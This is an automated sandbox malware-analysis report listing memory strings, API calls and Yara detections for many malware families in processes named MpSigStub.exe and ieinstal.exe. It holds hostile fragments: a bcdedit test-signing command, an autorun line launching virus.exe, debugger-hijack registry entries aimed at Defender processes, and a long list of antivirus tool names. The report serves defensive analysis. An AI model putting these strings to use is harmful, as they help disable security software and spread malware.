Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	Binary or memory string: MSVBVM60MSVBVM50MSVBVM events are artifactsRICHEDIT50Wmyself.dll%08x0x%xException in the timer procC:\Wallpaper1.bmp2 :\|:1 11EditButtonVDLL:HMValidateHandleCalledC:\C:\WinSta0SkypeControlAPISkypeControlAPIAttachSkypeControlAPIDiscoverGDI32.DLLArmadillo_MutexGDI32.DLLChildControlStaticListBoxScrollBarComboBox#32770DialogPEEMU:VirTool:Win32/Obfuscator_Upatreriched20.dllRichEditANSIWndProcRichEditMDICLIENTMDICLIENTlistboxWINSTA0WinSta0Winsta0Winsta000000409CursorInternet Explorer_ServerTibiaClientTibia#32769ATL:007BF380YTopWindowYahooBuddyMainYahoo! MessengerWMPlayerAppPlaying MP3NotepadMy saved passwords - NotepadProgram ManagerShell_TrayWndtooltips_class32CityBank log-inIEFrameBank of America log-infalsetrue_Dummy_0x6A__Dummy_0x69__Dummy_0x68__Dummy_0x67__Dummy_0x66__Dummy_0x65__Dummy_0x64__Dummy_0x63__Dummy_0x62__Dummy_0x61__Dummy_0x60__Dummy_0x5F__Dummy_0x5E__Dummy_0x5D__Dummy_0x5C__Dummy_0x5B__Dummy_0x5A__Dummy_0x59__Dummy_0x58__Dummy_0x57__Dummy_0x56__Dummy_0x55__Dummy_0x54__Dummy_0x53__Dummy_0x52__Dummy_0x51__Dummy_0x50__Dummy_0x4F__Dummy_0x4E__Dummy_0x4D__Dummy_0x4C__Dummy_0x4B__Dummy_0x4A__Dummy_0x49__Dummy_0x48__Dummy_0x47__Dummy_0x46__Dummy_0x45__Dummy_0x44__Dummy_0x43__Dummy_0x42__Dummy_0x41__Dummy_0x40__Dummy_0x3F__Dummy_0x3E__Dummy_0x3D__Dummy_0x3C__Dummy_0x3B__Dummy_0x3A__Dummy_0x39__Dummy_0x38__Dummy_0x37__Dummy_0x36__DummyAA__DummyZ__DummyW__DummyV__DummyU__DummyT__DummyS__DummyR__DummyQ__DummyP__DummyO__DummyN__DummyM__DummyL__DummyK__DummyJ__DummyI__DummyH__DummyG__DummyF__DummyE__DummyD__DummyC__DummyB__DummyA__Dummy9__Dummy_x1c__Dummy7__Dummy6__Dummy5__Dummy4__Dummy3__Dummy2__Dummy_
Source: ieinstal.exe, 0000000D.00000002.19667826356.0000000003620000.00000002.00020000.sdmp, MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: ieinstal.exe, 0000000D.00000002.19667826356.0000000003620000.00000002.00020000.sdmp, MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: ieinstal.exe, 0000000D.00000002.19667826356.0000000003620000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	Binary or memory string: %s\Rundll32.exe "%s\%s",DllCanUnloadNowShell_TrayWndSoftware\
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: ~SystemCache.batShell_TrayWnd
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	Binary or memory string: \Internet Explorer\Quick Launch\Shell_TrayWnd
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: Progman Folder*Administrative Tools
Source: ieinstal.exe, 0000000D.00000002.19667826356.0000000003620000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	Binary or memory string: Explorer.exeShell_TrayWndGetProc
Source: ieinstal.exe, 0000000D.00000002.19674952257.000000001E8D5000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: MpSigStub.exe, 00000026.00000003.18332878772.00000138BD2D2000.00000004.00000001.sdmp	Binary or memory string: shell_traywnd

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B582418C cpuid

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B57DF3E8 GetCurrentProcessId,GetCurrentProcessId,CreateNamedPipeW,GetCurrentProcessId,

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B582D874 RtlGetVersion,RtlNtStatusToDosError,SetLastError,GetLastError,

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe

Code function: 37_2_00007FF7202E8ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected LimeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

May enable test signing (to load unsigned drivers)

Show sources

Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp

Memory string: bcdedit.exe -set TESTSIGNING ON

Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp

Binary or memory string: S:(ML;;NRNWNX;;;LW)]

Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: scanwscs.exe
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: Bsoftware\microsoft\windows\currentversion\app paths\wireshark.exe
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	Binary or memory string: procmon.exe
Source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp	Binary or memory string: tcpview.exe
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: \startup\360tray.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: fsgk32.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: bullguard.exe
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: kav32.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: fsm32.exe
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: ravmond.exe
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	Binary or memory string: \windows defender\msascui.exe
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	Binary or memory string: hijackthis.exe
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	Binary or memory string: \msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	Binary or memory string: fsav32.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: FSMA32.EXE
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	Binary or memory string: [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: kavsvc.exe
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	Binary or memory string: fsbl.exe
Source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp	Binary or memory string: procdump.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: fpavserver.exe
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: kxetray.exe
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: \360tray.exe
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	Binary or memory string: \virus.exe
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: wireshark.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: KAVPFW.EXE
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: sbamtray.exe
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: pctsGui.exe
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	Binary or memory string: 360tray.exe
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: kpfwsvc.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: 360Tray.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: superantispyware.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: mcvsshld.exe
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	Binary or memory string: [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: RavmonD.exe
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	Binary or memory string: \windows defender\msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: op_mon.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: k7emlpxy.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: CCenter.exe
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	Binary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: KWatch.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: quhlpsvc.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: KvXP.kxp
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: kpfw32.exe
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: k7pssrvc.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: k7tsmngr.exe
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	Binary or memory string: *.csv.\|!\SBAMSvc.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: emlproxy.exe
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	Binary or memory string: nod32.exe
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	Binary or memory string: kav.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: kvsrvxp.exe
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	Binary or memory string: \360safe.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: fprottray.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: clamtray.exe
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	Binary or memory string: savservice.exe
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	Binary or memory string: nod32krn.exe
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: avgupd.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: guardxservice.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: DefWatch.exe
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	Binary or memory string: regshot.exe
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: bdagent.exe
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: kavstart.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: k7fwsrvc.exe
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: KavPFW.EXE
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	Binary or memory string: lordpe.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: avkservice.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: virusutilities.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.manifest.\|!\SavService.exe
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	Binary or memory string: autoruns.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: k7rtscan.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: SPIDERNT.EXE
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: mcagent.exe
Source: MpSigStub.exe, 00000026.00000003.18296056460.00000138BE07F000.00000004.00000001.sdmp	Binary or memory string: msascui.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: ICESWORD.EXE
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: avkproxy.exe
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	Binary or memory string: AyAgent.aye
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	Binary or memory string: AVGcsrvx.exe
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: RC:\Program Files\Wireshark\wireshark.exe
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	Binary or memory string: bdss.exe
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: AVP.EXE
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: sbamsvc.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: Vsserv.exe
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: IceSword.exe
Source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: clamwin.exe
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: kvxp.kxp
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	Binary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: fsma32.exe
Source: MpSigStub.exe, 00000026.00000003.18332044939.00000138BE4E0000.00000004.00000001.sdmp	Binary or memory string: MSASCui.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: acs.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: avp.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: 360safe.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	Binary or memory string: RavTask.exe
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	Binary or memory string: Wireshark.exe
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	Binary or memory string: 360Safe.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: KAV32.exe
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	Binary or memory string: c:\123.exe
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	Binary or memory string: \procdump.exe
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	Binary or memory string: *.jpg.\|!\SavService.exe
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: avgnt.exe
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	Binary or memory string: \vipre business agent\sbamsvc.exe
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: a2guard.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: mbam.exe
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	Binary or memory string: ollydbg.exe
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	Binary or memory string: (\avp.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: FSMB32.EXE
Source: MpSigStub.exe, 00000026.00000003.18345351380.00000138BE66C000.00000004.00000001.sdmp	Binary or memory string: Image File Execution Options\msmpeng.exeDebuggerImage File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: avktray.exe
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	Binary or memory string: Regshot.exe
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: nod32kui.exe
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	Binary or memory string: KPFW32.EXE
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	Binary or memory string: mcshield.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: icesword.exe
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	Binary or memory string: \App Paths\360Safe.exe
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	Binary or memory string: AVGcmgr.exe
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: fsav.exe
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	Binary or memory string: delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp, mpam-77b29277.exe	Binary or memory string: MsMpEng.exe
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	Binary or memory string: "\vipre business agent\sbamsvc.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: onlinent.exe
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	Binary or memory string: \MsMpEng.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: FSAV32.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: cmdagent.exe
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: avguard.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: fpwin.exe
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: zlclient.exe
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	Binary or memory string: avgtray.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: McShield.exe
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	Binary or memory string: RImage File Execution Options\MSMPENG.exe
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Binary or memory string: TmPfw.exe
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	Binary or memory string: KVMonXP.kxp
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: procexp.exe
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	Binary or memory string: %installlocation%\msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: license.rtf.\|!\SavService.exe
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	Binary or memory string: k7tsecurity.exe
Source: MpSigStub.exe, 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp	Binary or memory string: /delc:\programme\"windowsdefender"\msmpeng.exe
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	Binary or memory string: Mcshield.exe
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	Binary or memory string: regmon.exe

Stealing of Sensitive Information:

Yara detected Snake Keylogger

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Evrial Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected GhostRat

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Mini RAT

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Koadic

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Arcane Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Vidar stealer

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Mimikatz

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected LaZagne password dumper

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Discord Token Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected MailPassView

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Parallax RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Valak

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Baldr

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Telegram RAT

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Njrat

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE
